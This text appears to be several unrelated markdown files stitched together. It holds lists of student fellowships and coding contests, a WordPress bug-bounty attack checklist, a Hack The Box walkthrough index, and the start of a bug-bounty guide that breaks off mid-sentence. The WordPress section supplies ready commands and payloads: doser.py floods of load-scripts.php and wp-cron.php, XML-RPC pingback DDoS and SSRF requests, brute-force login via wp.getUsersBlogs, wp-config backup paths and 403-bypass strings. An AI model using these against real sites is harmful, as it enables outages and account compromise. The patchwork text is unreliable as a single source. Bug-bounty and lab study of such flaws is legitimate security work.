students](https://www.ugc.ac.in/oldpdf/xiplanpdf/meritorious%20students.pdf) - It is to promote quality research in University/Departments. * [Junior research fellowship in engineering and technology](https://www.ugc.ac.in/oldpdf/xiplanpdf/JRFE-T.pdf) - It is for those who wish to pursue Ph.D. degree in engineering and technology. * [Swarnajayanti fellowships scheme](https://dst.gov.in/scientific-programmes/scientific-engineering-research/human-resource-development-and-nurturing-young-talent-swarnajayanti-fellowships-scheme) - For providing special assistance and support to talented young scientist. ## Programming Events [Back to Top](#contents) * [Google Summer of Code](https://summerofcode.withgoogle.com) - A global program focused on bringing more student developers into open source software development. * [Google CodeJam](https://code.google.com/codejam/) - Google’s largest coding competition. * [Google Kickstart](https://code.google.com/codejam/kickstart/) - Many online rounds to give students the opportunity to develop their coding skills and pursue a career at Google. * [Google HashCode](https://hashcode.withgoogle.com) - Programming competition organized by Google for students and industry professionals across Europe, the Middle East and Africa. * [Google Code-in](https://codein.withgoogle.com/) - A competition for pre-university students(13 to 17 years old) to introduce themselves to the world of open source by doing small tasks for various open source projects. * [ACM-ICPC](https://icpc.baylor.edu/) - The International Collegiate Programming Contest is an algorithmic programming contest for college students. * [Facebook HackerCup](https://www.facebook.com/hackercup/) - Annual programming contest organized by Facebook. * [List of Open Source Internship Programs](https://github.com/tapasweni-pathak/SOC-Programs) - Includes [Rails Girls Summer of Code](https://railsgirlssummerofcode.org/) and [Outreachy](https://www.outreachy.org/). * [Hactoberfest](https://hacktoberfest.digitalocean.com) - Organized by Digital Ocean in October. * [IEEEXtreme](https://ieeextreme.org) - Annual 24 hour long team contest for IEEE members. ## Hackathons [Back to Top](#contents) * [Devpost](http://devpost.com/hackathons) - Online or in-person hackathons browsing platform. * [hackathon.io](http://hackathon.io) - Browse in-person hackathons. * [Hackalist](https://www.hackalist.org) - List of upcoming hackathons. * [AngelHack](https://angelhack.com) - Hackathon planning organization. * [Hackevents](https://hackevents.co/hackathons) - Hackathons search engine. * [Yelp Dataset Challenge](https://www.yelp.com/dataset/challenge) - The challenge is a chance for students to conduct research or analysis on our data and share their discoveries with Yelp. * [hack.summit()](https://www.crowdcast.io/hack_summit) - Virtual conference where you can learn from the world's most renowned programmers. * [Major League Hacking Event Page](https://mlh.io/) - A list of a ton of events that are sponsored by the official hackathon league * [Microsoft Imagine Cup](https://imaginecup.microsoft.com/en-us/Events?id=0)-Bring your tech idea to life with the Imagine Cup and make a difference through creativity, collaboration, and competition. ## General Opportunities [Back to Top](#contents) * [Github Student Pack](https://education.github.com/pack) - Get free access to the best developer tools in one place. * [Visual Studio Dev Essentials](https://www.visualstudio.com/dev-essentials/) - Free learning resources and programming tools.
# Wordpress Common Misconfiguration Here I will try my best to mention all common security misconfigurations for Wordpress I saw before or officially referenced. I will be attaching all poc and reference as well # Index * [Wordpress Detection](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/blob/main/WordPress/README.md#wordpress-detection) * [General Scan Tool](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/blob/main/WordPress/README.md#geneal-scan-tool) * [Admin Panel](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/blob/main/WordPress/README.md#admin-panel) * [CVE-2018-6389](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/blob/main/WordPress/README.md#cve-2018-6389) * [xmlrpc.php](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/blob/main/WordPress/README.md#xmlrpcphp) * [Denial of Service via Cronjob](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/blob/main/WordPress/README.md#denial-of-service-via-cronjob) * [Denial of Service via load-scripts.php (CVE-2018-6389)](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/blob/main/WordPress/README.md#denial-of-service-via-load-scriptsphp-cve-2018-6389) * [WP User Enumeration](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/blob/main/WordPress/README.md#wp-user-enumeration) * [Sensitive files exposed](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/blob/main/WordPress/README.md#sensitive-files-exposed) * [Bypass 403](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/blob/main/WordPress/README.md#Bypass-403) * [Enumerating plugins](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/blob/main/WordPress/README.md#enumerating-plugins) * [Find wordpress origin IP](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/edit/main/WordPress/README.md#find-origin-ip-in-wordpress) # Wordpress Detection Well, if you are reading this you already know about technology detection tool and methods. Still adding them below * Wappalyzer * WhatRuns * BuildWith # Geneal Scan Tool * [WpScan](https://github.com/wpscanteam/wpscan) * [WPrecon](https://github.com/blackcrw/wprecon) * [cms-checker](https://github.com/oways/cms-checker) * [https://wpsec.com](https://wpsec.com/) * [For more see this](https://www.infosecmatter.com/cms-vulnerability-scanners-for-wordpress-joomla-drupal-moodle-typo3/) # Admin Panel If you find admin login panel you must report it in pentest. On a typical WordPress install, all you need to do is add /login/ or /admin/ to the end of your site URL. For example: `www.example.com/admin/`</br> `www.example.com/login/` If for some reason, your WordPress login URL is not working properly, then you can easily access the WordPress login page by going to this URL: `www.example.com/wp-login.php` Or you can directly access your admin area by entering the website URL like this: `www.example.com/admin/`</br> `www.example.com/wp-admin/` ### Bypass * If you cant find admin panel Just go to /wp-admin/install.php and you'll find out where the login page has moved! * If you got 403 try methods that will explain in "[Bypass 403 pages](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist/blob/main/WordPress/README.md#bypass-403)". # CVE-2018-6389 This issue can down any Wordpress site under 4.9.3 So while reporting make sure that your target website is running wordpress under 4.9.3 ### Detection Use the URL from my gist called loadsxploit, you will get a massive js data in response. [loadsxploit](https://gist.github.com/remonsec/4877e9ee2b045aae96be7e2653c41df9) ### Exploit You can use any Dos tool i found Doser really fast and it shut down the webserver within 30 second [Doser](https://github.com/quitten/doser.py) ``` python3 doser.py -t 999 -g 'https://site.com/fullUrlFromLoadsxploit' ``` ### References [H1 Report](https://hackerone.com/reports/752010) [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389) [Blog Post](https://baraktawily.blogspot.com/2018/02/how-to-dos-29-of-world-wide-websites.html) # xmlrpc.php This is one of the common issue on wordpress. To get some bucks with this misconfiguration you must have to exploit it fully, and have to show the impact properly as well. <br></br> what is XMLRPC : </br> XML-RPC is a remote procedure call (RPC) protocol which uses XML to encode its calls and HTTP as a transport mechanism.“XML-RPC” also refers generically to the use of XML for remote procedure call, independently of the specific protocol.Basically its a file which can be used for pulling POST data from a website through Remote Procedure Call. </br> in wordpress its a API which allows developers for doing manipulations in the wordpress site for eg: </br> Publish a post, Edit a post , Delete a post and even possible to upload some files. </br> ### Detection * visit site.com/xmlrpc.php * Get the error message about POST request only ### Exploit * Intercept the request and change the method GET to POST * List all Methods ``` <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall> ``` * Check the ```pingback.ping``` mentod is there or not * Perform DDOS ``` <methodCall> <methodName>pingback.ping</methodName> <params><param> <value><string>http://<YOUR SERVER >:<port></string></value> </param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string> </value></param></params> </methodCall> ``` * Perform SSRF (Internal PORT scan only) ``` <methodCall> <methodName>pingback.ping</methodName> <params><param> <value><string>http://<YOUR SERVER >:<port></string></value> </param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string> </value></param></params> </methodCall> ``` ![xmlrpctossrf](https://user-images.githubusercontent.com/63053441/137260425-a41ced8d-ce2b-4dd3-a98b-a78a0def55f0.jpg) ![xmlrpctossrf2](https://user-images.githubusercontent.com/63053441/137260444-ae4eaf77-1e0e-43e9-a2b2-6babee48cc75.jpg) ### Tool To Automate XMLRPC-Scan. [XMLRPC-Scan](https://github.com/nullfil3/xmlrpc-scan) ### References [Bug Bounty Cheat Sheet](https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html) [Medium Writeup](https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32) [WpEngine Blog Post](https://wpengine.com/resources/xmlrpc-php/) # Denial of Service via Cronjob This is another area where you can perform a DOS attack. ### Detection * visit site.com/wp-cron.php * You will see a Blank page with 200 HTTP status code ### Exploit You can use the same tool Doser for exploiting this ``` python3 doser.py -t 999 -g 'https://site.com/wp-cron.php' ``` ### Reference [GitHub Issue](https://github.com/wpscanteam/wpscan/issues/1299) [Medium Writeup](https://medium.com/@thecpanelguy/the-nightmare-that-is-wpcron-php-ae31c1d3ae30) # Denial of Service via load-scripts.php (CVE-2018-6389) In WordPress through 4.9.2 allows users to load multiple JS files and CSS files through load-scripts.php files at once. For example, https://example.com/wp-admin/load-scripts.php?c=1&load[]=jquery-ui-core,editor&ver=4.9.1, file load-scripts.php will load jquery-ui-core and editor files automatically and return the contents of the file. However, the number and size of files are not restricted in the process of loading JS files, attackers can use this function to deplete server resources and launch denial of service attacks. the load-scripts.php file was receiving a parameter called load[]. This parameter is an array that was receiving the names of the JS files that needed to be loaded. In this case, it was receiving jQuery UI Core, which is the name of one of the Javascript files used by the WordPress login page. (it can be longer, this is just an example) As no rate-limiting is setup for this URL - then DoS comes real. ``` http://example.com/wp-admin/load-scripts.php?c=1&load[]=jquery-ui-core&ver=4.9.1 ``` ### Exploit ``` http://example.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter Also You Can Use load-styles.php: http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic ``` ### Reference [hackerone](https://hackerone.com/reports/694467) # WP User Enumeration This issue will only acceptable when target website is hiding their current users or they are not publically available. So attacker can use those user data for bruteforcing and other staff ### Methods - CVE-2017-5487 - visit site.com/wp-json/wp/v2/users/ - You will see json data with user info in response - if you got 403 error you can use this bypass </br> ![wpb](https://user-images.githubusercontent.com/63053441/137262896-0d59a62d-c386-4009-af84-4266b72428b6.png) - try `http://target.com/?rest_route=/wp/v2/users` - /?author=1 - `http://target.com/?author=1` - Increment the number to get more - User enum with admin panel - If you have access to admin panell you can get valid usernames </br> ![wpb](https://user-images.githubusercontent.com/63053441/137263541-19c7df14-4ae4-41f7-b5c3-2a438bb05eb1.png)<br></br> ### Exploit If you have xmlrpc.php and this User enumeration both presence there. Then you can chain them out by collecting username from wp-json and perform Bruteforce on them via xmlrpc.php. It will surely show some extra effort and increase the impact as well.</br> To perform the bruteforce login send the following request in the POST method.</br> ``` <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>admin</value></param> <param><value>pass</value></param> </params> </methodCall> ``` ![image](https://user-images.githubusercontent.com/63053441/137264288-1cd036f8-a002-4409-8b23-ab8833cc6984.png)</br> I think now you can assume the impact of this vulnerability , it can be used to perform bruteforce attacks for secure credentials and also can automate a major DDOS attack. </br> Usefull methods: ``` wp.getUserBlogs wp.getCategories metaWeblog.getUsersBlogs ``` ### Reference [H1 Report](https://hackerone.com/reports/356047) # Sensitive files exposed This is list of files that can exposure sensitive data, so add it to your list ``` wp-includes wp-content/uploads wp-content/debug.log Wp-load Wp-json index.php wp-login.php wp-links-opml.php wp-activate.php wp-blog-header.php wp-cron.php wp-links.php wp-mail.php xmlrpc.php wp-settings.php wp-trackback.php wp-ajax.php wp-admin.php wp-config.php .wp-config.php.swp wp-config.inc wp-config.old wp-config.txt wp-config.html wp-config.php.bak wp-config.php.dist wp-config.php.inc wp-config.php.old wp-config.php.save wp-config.php.swp wp-config.php.txt wp-config.php.zip wp-config.php.html wp-config.php~ /wp-admin/setup-config.php?step=1 /wp-admin/install.php ``` # Bypass 403 - X-Rewrite-Url Header is Can be used to bypass WordPress 403 pages. ``` POST /xmlrpc HTTP/1.1 Host: http://target.com X-Rewrite-Url: xmlrpc.php X-Rewrite-Url: wp-json/v2/users X-Rewrite-Url: wp-login.php ``` - Authorization bypass using .json ![image](https://user-images.githubusercontent.com/63053441/137277282-accb1647-a966-4c91-b319-3f29cfc1381c.png) Endpoint bypass paylod list: ``` ? ?? & # % %20 %09 / /..;/ ../ ..%2f ..:/ ../ \..\.\ .././ ..%00/ ..%0d/ ..%5c ..\ ..%ff %2e%2e%2e%2f .%2e/ %3f %26 %23 .json ``` ### Tools https://github.com/yunemse48/403bypasser</br> https://github.com/iamj0ker/bypass-403 # Enumerating plugins If you have a Wordpreess target, dont forget to enumerate the plugins on "/wp-content/plugins/FUZZ/readme.txt". Read the stable tag, and try to find CVEs or exploits for that versions. Alse you can use:</br> `grep all "wp-content/plugins/" from html`<br></br> You cant find some common exploits here:</br> https://github.com/Mad-robot/wordpress-exploits # Find Origin Ip in wordpress If wordpress is protected with wafs, you can brute force `GET /wp-json/wp/v2/media/§1§` to find real ip. In some cases you will got 200 OK in GET /wp-json/wp/v2/media/1123 and you find real IP is routing. # References Twitters:</br> @jae_hak99 @minometidji @sw33tLie @Jester0x01 @daffainfo @SalimAlk15 @xalerafera @gopalsamy_ru @16yashpatel @fuxsocy_py @EkinBayer4 @3XS0 @CyberWarship @vxer0dayz</br> </br>https://github.com/daffainfo/AllAboutBugBounty</br> https://github.com/KathanP19/HowToHunt</br> https://malavsharma.medium.com/wordpress-xmlrpc-php-my-first-resolved-report-bee438f35ad8
# HackTheBox CTF Cheatsheet This cheatsheet is aimed at the CTF Players and Beginners to help them sort Hack The Box Labs on the basis of Operating System and Difficulty. This list contains all the Hack The Box writeups available on hackingarticles. We have performed and compiled this list on our experience. Please share this with your connections and direct queries and feedback to [Pavandeep Singh](https://twitter.com/pavan2318). [1.1]: http://i.imgur.com/tXSoThF.png [1]: http://www.twitter.com/hackinarticles # Follow us on [![alt text][1.1]][1] | No. | Machine Name | Operating System | Difficulty | |-----|--------------|------------------|------------------| | 1. | [Access](https://www.hackingarticles.in/hack-the-box-access-walkthrough/)|Windows|Easy| | 2. | [Active](https://www.hackingarticles.in/hack-the-box-active-walkthrough/)|Windows|Easy| | 3. | [Apocalyst](https://www.hackingarticles.in/hack-the-box-challenge-apocalyst-walkthrough/)|Linux|Medium| | 4. | [Aragog](https://www.hackingarticles.in/hack-the-box-aragog-walkthrough/)|Linux|Medium| | 5. | [Arctic](https://www.hackingarticles.in/hack-the-box-challenge-arctic-walkthrough/)|Windows|Easy| | 6. | [Ariekei](https://www.hackingarticles.in/hack-the-box-challenge-ariekei-walkthrough/)|Linux|Insane| | 7. | [Bank](https://www.hackingarticles.in/hack-the-box-challenge-bank-walkthrough/)|Linux|Easy| | 8. | [Bart](https://www.hackingarticles.in/hack-the-box-bart-walkthrough/)|Windows|Medium| | 9. | [Bashed](https://www.hackingarticles.in/hack-the-box-challenge-bashed-walkthrough/)|Linux|Easy| | 10. | [Beep](https://www.hackingarticles.in/hack-the-box-challenge-beep-walkthrough/)|Linux|Easy| | 11. | [Blocky](https://www.hackingarticles.in/hack-the-box-challenge-blocky-walkthrough/)|Linux|Easy| | 12. | [Blue](https://www.hackingarticles.in/hack-the-box-challenge-blue-walkthrough/)|Windows|Easy| | 13. | [Bounty](https://www.hackingarticles.in/hack-the-box-bounty-walkthrough/)|Windows|Easy| | 14. | [Brainfuck](https://www.hackingarticles.in/hack-the-box-challenge-brainfuck-walkthrough/)|Linux|Insane| | 15. | [Calamity](https://www.hackingarticles.in/hack-the-box-challenge-calamity-walkthrough/)|Linux|Hard| | 16. | [Canape](https://www.hackingarticles.in/hack-the-box-challenge-canape-walkthrough/)|Linux|Medium| | 17. | [Carrier](https://www.hackingarticles.in/hack-the-box-carrier-walkthrough/)|Linux|Medium| | 18. | [Celestial](https://www.hackingarticles.in/hack-the-box-celestial-walkthrough/)|Linux|Medium| | 19. | [Charon](https://www.hackingarticles.in/hack-the-box-challenge-charon-walkthrough/)|Linux|Hard| | 20. | [Chatterbox](https://www.hackingarticles.in/hack-the-box-challenge-chatterbox-walkthrough/)|Windows|Medium| | 21. | [Crimestoppers](https://www.hackingarticles.in/hack-the-box-challenge-crimestoppers-walkthrough/)|Windows|Hard| | 22. | [Cronos](https://www.hackingarticles.in/hack-the-box-challenge-cronos-walkthrough/)|Linux|Hard| | 23. | [Curling](https://www.hackingarticles.in/hack-the-box-curling-walkthrough/)|Linux|Easy| | 24. | [Dab](https://www.hackingarticles.in/hack-the-box-dab-walkthrough/)|Linux|Hard| | 25. | [Devel](https://www.hackingarticles.in/hack-the-box-challenge-devel-walkthrough/)|Windows|Easy| | 26. | [DevOops](https://www.hackingarticles.in/hack-the-box-devoops-walkthrough/)|Linux|Medium| | 27. | [Dropzone](https://www.hackingarticles.in/hack-the-box-dropzone-walkthrough/)|Windows|Hard| | 28. | [Enterprise](https://www.hackingarticles.in/hack-the-box-challenge-enterprises-walkthrough/)|Linux|Medium| | 29. | [Europa](https://www.hackingarticles.in/hack-the-box-challenge-europa-walkthrough/)|Linux|Medium| | 30. | [Falafel](https://www.hackingarticles.in/hack-the-box-challenge-falafel-walkthrough/)|Linux|Hard| | 31. | [Fighter](https://www.hackingarticles.in/hack-the-box-fighter-walkthrough/)|Windows|Insane| | 32. | [Fluxcapacitor](https://www.hackingarticles.in/hack-the-box-challenge-fluxcapacitor-walkthrough/)|Linux|Medium| | 33. | [FriendZone](https://www.hackingarticles.in/hack-the-box-friendzone-walkthrough/)|Linux|Easy| | 34. | [Frolic](https://www.hackingarticles.in/hack-the-box-frolic-walkthrough/)|Linux|Easy| | 35. | [Fulcurm](https://www.hackingarticles.in/hack-the-box-fulcrum-walkthrough/)|Linux|Easy| | 36. | [Giddy](https://www.hackingarticles.in/hack-the-box-giddy-walkthrough/)|Windows|Medium| | 37. | [Grandpa](https://www.hackingarticles.in/hack-the-box-challenge-grandpa-walkthrough/)|Windows|Easy| | 38. | [Granny](https://www.hackingarticles.in/hack-the-box-challenge-granny-walkthrough/)|Windows|Easy| | 39. | [Haircut](https://www.hackingarticles.in/hack-the-box-challenge-haircut-walkthrough/)|Linux|Medium| | 40. | [Hawk](https://www.hackingarticles.in/hack-the-box-hawk-walkthrough/)|Linux|Medium| | 41. | [Help](https://www.hackingarticles.in/hack-the-box-help-walkthrough/)|Linux|Easy| | 42. | [Holiday](https://www.hackingarticles.in/hack-the-box-holiday-walkthrough/)|Linux|Hard| | 43. | [Inception](https://www.hackingarticles.in/hack-the-box-challenge-inception-walkthrough/)|Linux|Medium| | 44. | [Irked](https://www.hackingarticles.in/hack-the-box-irked-walkthrough/)|Linux|Easy| | 45. | [Jail](https://www.hackingarticles.in/hack-the-box-challenge-jail-walkthrough/)|Linux|Insane| | 46. | [Jeeves](https://www.hackingarticles.in/hack-the-box-challenge-jeeves-walkthrough/)|Windows|Medium| | 47. | [Jerry](https://www.hackingarticles.in/hack-the-box-jerry-walkthrough/)|Windows|Easy| | 48. | [Joker](https://www.hackingarticles.in/hack-the-box-challenge-joker-walkthrough/)|Linux|Hard| | 49. | [Kotarak](https://www.hackingarticles.in/hack-the-box-challenge-kotarak-walkthrough/)|Linux|Hard| | 50. | [Lame](https://www.hackingarticles.in/hack-the-box-challenge-lame-walkthrough/)|Linux|Easy| | 51. | [Lazy](https://www.hackingarticles.in/hack-the-box-challenge-lazy-walkthrough/)|Linux|Medium| | 52. | [Legacy](https://www.hackingarticles.in/hack-the-box-challenge-legacy-walkthrough/)|Windows|Easy| | 53. | [Lightweight](https://www.hackingarticles.in/lightweight-hack-the-box-walkthrough/)|Linux|Medium| | 54. | [Mantis](https://www.hackingarticles.in/hack-the-box-challenge-mantis-walkthrough/)|Windows|Hard| | 55. | [Minion](https://www.hackingarticles.in/hack-the-box-minion-walkthrough/)|Windows|Insane| | 56. | [Mirai](https://www.hackingarticles.in/hack-the-box-challenge-mirai-walkthrough/)|Linux|Easy| | 57. | [Mischief](https://www.hackingarticles.in/hack-the-box-mischief-walkthrough/)|Linux|Insane| | 58. | [Netmon](https://www.hackingarticles.in/hack-the-box-netmon-walkthrough/)|Windows|Easy| | 59. | [Nibble](https://www.hackingarticles.in/hack-the-box-challenge-nibble-walkthrough/)|Linux|Easy| | 60. | [Nightmare](https://www.hackingarticles.in/hack-nightmare-vm-ctf-challenge/)|Linux|Insane| | 61. | [Nineveh](https://www.hackingarticles.in/hack-the-box-nineveh-walkthrough/)|Linux|Medium| | 62. | [Node](https://www.hackingarticles.in/hack-the-box-challenge-node-walkthrough/)|Linux|Medium| | 63. | [October](https://www.hackingarticles.in/hack-the-box-october-walkthrough/)|Linux|Medium| | 64. | [Olympus](https://www.hackingarticles.in/hack-the-box-olympus-walkthrough/)|Linux|Medium| | 65. | [Optimum](https://www.hackingarticles.in/hack-the-box-challenge-optimum-walkthrough/)|Windows|Easy| | 66. | [Poison](https://www.hackingarticles.in/hack-the-box-poison-walkthrough/)|FreeBSD|Medium| | 67. | [Popcorn](https://www.hackingarticles.in/hack-the-box-challenge-popcorn-walkthrough/)|Linux|Medium| | 68. | [SecNotes](https://www.hackingarticles.in/hack-the-box-secnotes-walkthrough/)|Windows|Medium| | 69. | [Sense](https://www.hackingarticles.in/hack-the-box-challenge-sense-walkthrough/)|FreeBSD|Easy| | 70. | [Shocker](https://www.hackingarticles.in/hack-the-box-challenge-shocker-walkthrough/)|Linux|Easy| | 71. | [Shrek](https://www.hackingarticles.in/hack-the-box-challenge-shrek-walkthrough/)|Linux|Hard| | 72. | [Silo](https://www.hackingarticles.in/hack-the-box-silo-walkthrough/)|Windows|Medium| | 73. | [Sneaky](https://www.hackingarticles.in/hack-the-box-challenge-sneaky-walkthrough/)|Linux|Medium| | 74. | [Solid State](https://www.hackingarticles.in/hack-the-box-challenge-solid-state-walkthrough/)|Linux|Medium| | 75. | [Stratosphere](https://www.hackingarticles.in/hack-the-box-stratospherewalkthrough/)|Linux|Medium| | 76. | [Sunday](https://www.hackingarticles.in/hack-the-box-sunday-walkthrough/)|Solaris|Easy| | 77. | [Tally](https://www.hackingarticles.in/hack-the-box-challenge-tally-walkthrough/)|Windows|Hard| | 78. | [TartarSauce](https://www.hackingarticles.in/hack-the-box-tartarsauce-walkthrough/)|Linux|Medium| | 79. | [Teacher](https://www.hackingarticles.in/hack-the-box-teacher-walkthrough/)|Linux|Easy| | 80. | [Tenten](https://www.hackingarticles.in/hack-the-box-challenge-tenten-walkthrough/)|Linux|Medium| | 81. | [Valentine](https://www.hackingarticles.in/hack-the-box-valentine-walkthrough/)|Linux|Easy| | 82. | [Vault](https://www.hackingarticles.in/hack-the-box-vault-walkthrough/)|Linux|Medium| | 83. | [Waldo](https://www.hackingarticles.in/hack-the-box-waldo-walkthrough/)|Linux|Medium| | 84. | [Ypuffy](https://www.hackingarticles.in/hack-the-box-ypuffy-walkthrough/)|Others|Medium| | 85. | [Zipper](https://www.hackingarticles.in/hack-the-box-zipper-walkthrough/)|Linux|Hard| | 86. | [Luke](https://www.hackingarticles.in/hack-the-box-luke-walkthrough/)|Linux|Easy| | 87. | [Bastion](https://www.hackingarticles.in/hack-the-box-challenge-bastion-walkthrough/)|Windows|Easy| | 88. | [Heist](https://www.hackingarticles.in/hack-the-box-heist-walkthrough/) | Windows | Medium | | 89. | [Bitlab](https://www.hackingarticles.in/hack-the-box-challenge-bitlab-walkthrough/) | Linux | Medium | | 90. | [Jarvis](https://www.hackingarticles.in/hack-the-box-jarvis-walkthrough/) | Linux | Medium | | 91. | [Writeup](https://www.hackingarticles.in/hack-the-box-writeup-walkthrough/) | Linux | Easy | | 92. | [Networked](https://www.hackingarticles.in/hack-the-box-networked-walkthrough/) | Linux | Medium | | 93. | [Haystack](https://www.hackingarticles.in/hack-the-box-haystack-walkthrough/) | Linux | Medium | | 94. | [Postman](https://www.hackingarticles.in/hack-the-box-postman-walkthrough/) | Linux | Easy | | 95. | [Wall](https://www.hackingarticles.in/hack-the-box-wall-walkthrough/)| Linux | Medium | | 96. | [Open Admin Box](https://www.hackingarticles.in/hack-the-box-open-admin-box-walkthrough/)| Linux | Easy | | 97. | [Monteverde](https://www.hackingarticles.in/hack-the-box-monteverde-walkthrough/)| Windows | Medium | | 98. | [Sauna](https://www.hackingarticles.in/hackthebox-sauna-walkthrough/)| Windows | Easy | | 99. | [Conceal](https://www.hackingarticles.in/conceal-hackthebox-walkthrough/)| Windows | Hard | | 100. | [Tabby](https://www.hackingarticles.in/tabby-hackthebox-walkthrough/)| Linux | Easy | | 101. | [Omni](https://www.hackingarticles.in/omni-hackthebox-walkthrough/)| Windows | Easy | | 102. | [Mango](https://www.hackingarticles.in/mango-hackthebox-walkthrough/)| Linux | Medium | | 103. | [Servmon](https://www.hackingarticles.in/servmon-hackthebox-walkthrough/)| Windows | Easy | | 104. | [Bastard](https://www.hackingarticles.in/bastard-hackthebox-walkthrough/)| Windows | Medium | | 105. | [Cascade](https://www.hackingarticles.in/cascade-hackthebox-walkthrough/)| Windows | Medium | | 106. | [Traverxec](https://www.hackingarticles.in/traverxec-hackthebox-walkthrough/)| Linux | Easy | | 107. | [Forest](https://www.hackingarticles.in/forest-hackthebox-walkthrough/)| Windows | Easy | | 108. | [Admirer](https://www.hackingarticles.in/admirer-hackthebox-walkthrough/)| Linux | Easy |
# Guide to Bug Bounty Hunting ## Mindset If you are beginning bug bounty hunting, you will need to know that it will take time to learn the bug hunting skills. You need to have the patience and determination to continue hunting even though you might not see successful results quickly. The bug bounty field is crowded and competitive, hence you will require hardwork, dedication, lateral thinking to persist on. Hunting is about learning and acting noob all the time. Everyone starts from somewhere. > From Tommy (dawgyg) DeVoss: If you have the ability to look at a web application and think of ways to break the application, then you can give it a shot. For some people it can be a very slow start to the process, and others will start finding bugs right after they begin. A very important thing to remember when doing bug bounties is to not get depressed / upset if it takes you longer to find valid bugs etc. Not everyone is going to find bugs every time they sit down to hack. And its very common to go days, weeks or even months with out finding bugs. Don't compare your own success or failures to others. Because as with anything else, there will always be someone better than you, and others worse than you. So setting your own goals and working to acheive them can be very important. > From Shubs (https://shubs.io/so-you-want-to-get-into-bug-bounties/): If someone came up to you and asked you if you could find a security vulnerability in Facebook or Google, your knee-jerk reaction may be to explain how hard that would be because of how much money these companies spend on security and how many staff they have securing their applications. As a bug bounty hunter, you cannot have this mentality. It is extremely prohibitive, and as you find yourself finding security issues in the largest corporations in the world, you will soon realise that it is possible to find vulnerabilities in anything (given enough time and resources). What you may find is that some companies are harder to find vulnerabilities in (how long it takes to find security issues), and you may give up before you find anything, but you need to understand that there are still vulnerabilities yet to be found for any attack surface. <b>Rewards.</b> The lessons and knowledge learned are the only rewards that are within your control. So if you are a beginner, you should set the goal of learning about the vulnerabilities and techniques to exploit them rather than how much money you should make. <b>Responsiblity.</b> Do not disclose an issue if the counterparty have not agreed to do so. ## Learning <b>Web Application basics</b>. Learn how a request works, HTTP headers, JSON requests, 